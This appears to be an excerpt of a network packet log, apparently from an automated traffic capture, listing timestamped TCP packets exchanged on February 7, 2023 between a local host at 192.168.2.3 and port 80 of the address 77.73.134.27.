                                                                                    Feb 7, 2023 19:44:56.880141020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880148888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880173922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880175114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880189896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880201101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880215883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880224943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880240917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880251884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880265951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880276918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880292892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880302906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880319118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880327940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880345106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880352020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880371094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880377054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880394936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880402088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880426884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880450010 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880450964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880476952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880480051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880501032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880507946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880527020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880527973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880544901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880551100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880568027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880590916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880599022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880623102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880640030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880646944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880662918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880671978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880687952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880696058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880713940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880726099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880739927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880750895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880767107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880778074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880793095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880803108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880816936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880826950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880846024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880852938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880870104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880877972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880892038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880902052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880917072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880925894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880945921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880951881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880965948 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.880978107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.880991936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881002903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881021023 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881027937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881041050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881052971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881067038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881078005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881093979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881104946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881119967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881140947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881145954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881166935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881181955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881191969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881207943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881217003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881238937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881242990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881258965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881275892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881288052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881304979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881324053 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881330013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881346941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881381035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881397009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881407976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881422043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881433964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881448984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881460905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881477118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881485939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881506920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881511927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881529093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881536961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881552935 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881562948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881580114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881587029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881608963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881612062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881628990 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881637096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881650925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881663084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881680012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881686926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881704092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881711960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881726980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881740093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881755114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881764889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881782055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881789923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881803989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881814003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881831884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881839991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881856918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881865978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881882906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881891012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881908894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881917000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881933928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881942034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881956100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881968021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.881984949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.881993055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882009029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882018089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882035017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882042885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882061958 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882069111 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882083893 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882093906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882112026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882121086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882137060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882148981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882164001 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882172108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882191896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882196903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882213116 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882221937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882240057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882246971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882261992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882272005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882287979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882297039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882314920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882322073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882342100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882347107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882366896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882371902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.882389069 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.882412910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.888948917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.888979912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.889003992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.889027119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.889053106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.889087915 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.889147997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.895627975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895653009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895673037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895713091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895754099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895759106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.895773888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.895796061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.895804882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.895853996 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.897485971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.897521019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.897542953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.897562981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.897573948 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.897605896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.897670984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.897722006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.900101900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.900165081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.900207043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.900230885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.900245905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.900296926 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.901093960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.901124954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.901149988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.901159048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.901176929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.901187897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.901205063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.901216030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.901242018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.901267052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.904783010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904824972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904851913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904876947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904876947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.904900074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.904903889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904931068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904947042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.904957056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.904975891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.904983044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905004978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905010939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905036926 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905039072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905055046 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905066967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905088902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905092001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905116081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905121088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905139923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905148029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905164957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905174017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905195951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905200958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905227900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905250072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905250072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905255079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905272007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905303955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905318975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905344963 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905368090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905371904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905394077 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905399084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905426979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905441999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905448914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905474901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905494928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905502081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905522108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905528069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905550957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905555010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905567884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905581951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905601978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905608892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905630112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905635118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905662060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905666113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905679941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905687094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905711889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905719995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905741930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905749083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905771971 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905775070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905800104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905801058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905818939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905827999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905850887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905853987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905873060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905889988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905929089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905955076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.905957937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.905997038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906002045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906028986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906028986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906054974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906054974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906073093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906090021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906102896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906121969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906145096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906147003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906162024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906171083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906193972 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906196117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906212091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906222105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906246901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906246901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906264067 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906275034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906301022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906316042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906325102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906351089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906352997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906383038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906383991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906411886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906414986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906441927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906445026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906461954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906466961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906481981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906495094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906510115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906522036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906548023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906558037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906574011 CET804969877.73.134.27192.168.2.3
